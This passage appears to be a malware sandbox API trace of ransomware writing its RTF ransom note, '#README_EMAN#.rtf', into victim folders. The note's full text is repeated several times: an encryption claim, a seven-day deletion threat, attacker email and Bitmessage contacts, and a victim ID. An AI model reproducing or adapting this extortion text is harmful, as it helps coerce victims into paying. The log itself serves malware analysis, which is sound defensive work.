24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.092] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.092] CloseHandle (hObject=0x2e8) returned 1 [0292.093] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0292.093] GetLastError () returned 0x2 [0292.093] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.094] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s 